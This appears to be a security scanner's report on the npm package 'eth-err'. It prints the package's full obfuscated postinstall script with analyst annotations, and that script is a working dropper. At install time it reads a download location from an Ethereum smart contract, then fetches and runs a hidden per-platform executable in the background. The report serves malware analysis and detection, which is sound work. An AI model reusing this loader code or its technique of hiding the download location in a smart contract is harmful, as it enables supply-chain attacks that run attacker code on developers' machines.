Sandworm scans all new Npm package versions for malicious install scripts.
Scanning since October 2024.
eth-err:
Detected: 31 Oct 2024
Detected Date: 31 Oct 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm
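The postinstall script fetches and executes a remote executable chosen by operating-system platform (Windows, Linux or macOS). The download location is not hard-coded in the package: the script reads it at install time from a smart contract on Ethereum mainnet, so the package contains no URL or IP address for a static scan to flag or block, and the location can presumably be changed without publishing a new package version. The file is written to the OS temporary directory and started as a detached background process. This poses a significant risk: potentially malicious code is downloaded and run without user consent, with the privileges of the user running the install, which could lead to unauthorized access or control over the system. Installing with `npm install --ignore-scripts` prevents install scripts like this one from running.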
Install script: node 2eqk4ie0.cjs
Install script code:
/*
 * Analyst annotation. The code below is the captured sample, unchanged.
 *
 * Obfuscation layer: every property name and most literals are looked up
 * through _0x6649(index), which subtracts 0x1e6 from the index and reads from
 * the string table returned by _0x5377(). The IIFE that follows rotates that
 * table (push/shift) until a parseInt-based checksum equals 0xe6da3, so the
 * table order in the file is not the order used at run time.
 *
 * Strings visible in the table that are useful for triage: 'child_process',
 * 'chmodSync', 'tmpdir', 'createWriteStream', 'unref', 'ethers', 'axios',
 * 'mainnet', '/node-linux', '/node-macos', and the contract address
 * 0xa1b40044EBc2794f207D45143Bd82a1B86156c6b. The log messages in the table
 * are Russian ("Error getting IP address:", "Error launching file:",
 * "Installation error:").
 */
const _0x433a12=_0x6649;function _0x6649(_0x423793,_0x139b41){const _0x5377f3=_0x5377();return _0x6649=function(_0x6649b,_0x36d7f9){_0x6649b=_0x6649b-0x1e6;let _0x541edb=_0x5377f3[_0x6649b];return _0x541edb;},_0x6649(_0x423793,_0x139b41);}(function(_0x38c5ec,_0x413eba){const _0x3a187f=_0x6649,_0x40f39e=_0x38c5ec();while(!![]){try{const _0x2bc104=-parseInt(_0x3a187f(0x216))/0x1*(parseInt(_0x3a187f(0x203))/0x2)+-parseInt(_0x3a187f(0x20c))/0x3*(parseInt(_0x3a187f(0x1ed))/0x4)+-parseInt(_0x3a187f(0x1ec))/0x5+parseInt(_0x3a187f(0x211))/0x6*(parseInt(_0x3a187f(0x1f0))/0x7)+-parseInt(_0x3a187f(0x208))/0x8+-parseInt(_0x3a187f(0x1e7))/0x9+parseInt(_0x3a187f(0x1f5))/0xa*(parseInt(_0x3a187f(0x20b))/0xb);if(_0x2bc104===_0x413eba)break;else _0x40f39e['push'](_0x40f39e['shift']());}catch(_0xd0b7db){_0x40f39e['push'](_0x40f39e['shift']());}}}(_0x5377,0xe6da3));function _0x5377(){const _0x1fdd8b=['755','basename','AbTBi','child_process','Ошибка\x20при\x20получении\x20IP\x20адреса:','MLdvW','chmodSync','gEbcm','ethers','linux','createWriteStream','ignore','4NnaAJm','0xa1b40044EBc2794f207D45143Bd82a1B86156c6b','/node-macos','PpVNY','xiUnz','12457360oThUxF','GVdQK','tmpdir','11WgxkDa','2961PUEmGi','axios','pipe','evNGm','util','210IvdKEv','GET','Contract','win32','platform','353911BqMaeQ','Ошибка\x20при\x20запуске\x20файла:','oHbls','11219562WEHKaP','error','data','Unsupported\x20platform:\x20','darwin','2223360eBxirs','1780bdWooZ','path','Ошибка\x20установки:','204253PEInfy','mYeST','/node-linux','mainnet','unref','43198030uCvybk','join'];_0x5377=function(){return _0x1fdd8b;};return _0x5377();}const 
/*
 * Payload logic (table lookups resolved):
 *
 * - Loads ethers, axios, util, fs, path, os and child_process.spawn.
 * - contractAddress is the table entry 0xa1b40044EBc2794f207D45143Bd82a1B86156c6b;
 *   WalletOwner is the clear-text address below. The ABI declares one view
 *   function, getString(address), and the provider is the ethers default
 *   provider for 'mainnet'.
 * - fetchAndUpdateIp: calls contract.getString(WalletOwner) and returns the
 *   resulting string. On any error it logs and calls itself again, with no
 *   retry limit or delay.
 * - getDownloadUrl(base): appends '/node-win.exe' on win32, '/node-linux' on
 *   linux, '/node-macos' on darwin; any other platform throws
 *   'Unsupported platform: <platform>'.
 * - downloadFile(url, dest): axios GET with responseType 'stream', piped into
 *   fs.createWriteStream(dest); resolves on 'finish', rejects on 'error'.
 *   No hash or signature check of the downloaded file appears anywhere.
 *
 * Because the base location comes from the contract at run time, the sample
 * itself contains no host name or IP to use as a network indicator.
 */
{ethers}=require(_0x433a12(0x1ff)),axios=require(_0x433a12(0x20d)),util=require(_0x433a12(0x210)),fs=require('fs'),path=require(_0x433a12(0x1ee)),os=require('os'),{spawn}=require(_0x433a12(0x1fa)),contractAddress=_0x433a12(0x204),WalletOwner='0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84',abi=['function\x20getString(address\x20account)\x20public\x20view\x20returns\x20(string)'],provider=ethers['getDefaultProvider'](_0x433a12(0x1f3)),contract=new ethers[(_0x433a12(0x213))](contractAddress,abi,provider),fetchAndUpdateIp=async()=>{const _0x26fe2c=_0x433a12,_0x211ca7={'AbTBi':_0x26fe2c(0x1fb),'MLdvW':function(_0x5ebfa2){return _0x5ebfa2();}};try{const _0x155a21=await contract['getString'](WalletOwner);return _0x155a21;}catch(_0x389070){return console[_0x26fe2c(0x1e8)](_0x211ca7[_0x26fe2c(0x1f9)],_0x389070),await _0x211ca7[_0x26fe2c(0x1fc)](fetchAndUpdateIp);}},getDownloadUrl=_0x2a06fb=>{const _0x18126a=_0x433a12,_0x215685={'GVdQK':'win32','aFooR':_0x18126a(0x200),'zMZKi':_0x18126a(0x1eb)},_0xaa9e56=os['platform']();switch(_0xaa9e56){case _0x215685[_0x18126a(0x209)]:return _0x2a06fb+'/node-win.exe';case _0x215685['aFooR']:return _0x2a06fb+_0x18126a(0x1f2);case _0x215685['zMZKi']:return _0x2a06fb+_0x18126a(0x205);default:throw new Error(_0x18126a(0x1ea)+_0xaa9e56);}},downloadFile=async(_0x1573d6,_0xb896b)=>{const _0x3dec01=_0x433a12,_0x8d2ebf={'xiUnz':_0x3dec01(0x1e8),'PpVNY':function(_0x5bc8c0,_0x443bdb){return _0x5bc8c0(_0x443bdb);},'InfJo':'stream'},_0x24ebbd=fs[_0x3dec01(0x201)](_0xb896b),_0xa69a8a=await _0x8d2ebf[_0x3dec01(0x206)](axios,{'url':_0x1573d6,'method':_0x3dec01(0x212),'responseType':_0x8d2ebf['InfJo']});return _0xa69a8a[_0x3dec01(0x1e9)][_0x3dec01(0x20e)](_0x24ebbd),new Promise((_0x13b060,_0x45b234)=>{const _0x2f58f9=_0x3dec01;_0x24ebbd['on']('finish',_0x13b060),_0x24ebbd['on'](_0x8d2ebf[_0x2f58f9(0x207)],_0x45b234);});},executeFileInBackground=async _0x52688b=>{const 
/*
 * - executeFileInBackground(file): spawn(file, [], { detached: true,
 *   stdio: 'ignore' }) followed by unref(), so the child is not tied to the
 *   parent's stdio and the parent does not wait for it. A spawn error is only
 *   logged.
 * - runInstallation: read the base location from the contract, build the
 *   per-platform URL, save the file as
 *   path.join(os.tmpdir(), path.basename(url)), chmodSync(dest, '755') on
 *   every platform except win32, then launch it. All errors are caught and
 *   written with console.error, so a failure here likely does not fail the
 *   package installation.
 *
 * Detection points a defender can derive from this flow: a node process
 * started by a package-manager lifecycle script that contacts Ethereum RPC
 * endpoints, a file named node-win.exe, node-linux or node-macos created in
 * the temporary directory, and a detached child process started from that
 * path.
 */
_0x111d0b=_0x433a12,_0x514c4e={'oHbls':function(_0x21ebe7,_0x3b8086,_0x3b178a,_0x338d8e){return _0x21ebe7(_0x3b8086,_0x3b178a,_0x338d8e);},'evNGm':_0x111d0b(0x202),'mYeST':_0x111d0b(0x217)};try{const _0x58528d=_0x514c4e[_0x111d0b(0x1e6)](spawn,_0x52688b,[],{'detached':!![],'stdio':_0x514c4e[_0x111d0b(0x20f)]});_0x58528d[_0x111d0b(0x1f4)]();}catch(_0x5a9571){console[_0x111d0b(0x1e8)](_0x514c4e[_0x111d0b(0x1f1)],_0x5a9571);}},runInstallation=async()=>{const _0x5e679d=_0x433a12,_0x16cd20={'gEbcm':function(_0x333645,_0x7ba60f){return _0x333645(_0x7ba60f);}};try{const _0x324dce=await fetchAndUpdateIp(),_0x3f2926=_0x16cd20[_0x5e679d(0x1fe)](getDownloadUrl,_0x324dce),_0x11af73=os[_0x5e679d(0x20a)](),_0x59df5b=path[_0x5e679d(0x1f8)](_0x3f2926),_0x1b3fa4=path[_0x5e679d(0x1f6)](_0x11af73,_0x59df5b);await downloadFile(_0x3f2926,_0x1b3fa4);if(os[_0x5e679d(0x215)]()!==_0x5e679d(0x214))fs[_0x5e679d(0x1fd)](_0x1b3fa4,_0x5e679d(0x1f7));executeFileInBackground(_0x1b3fa4);}catch(_0x59921d){console['error'](_0x5e679d(0x1ef),_0x59921d);}};runInstallation();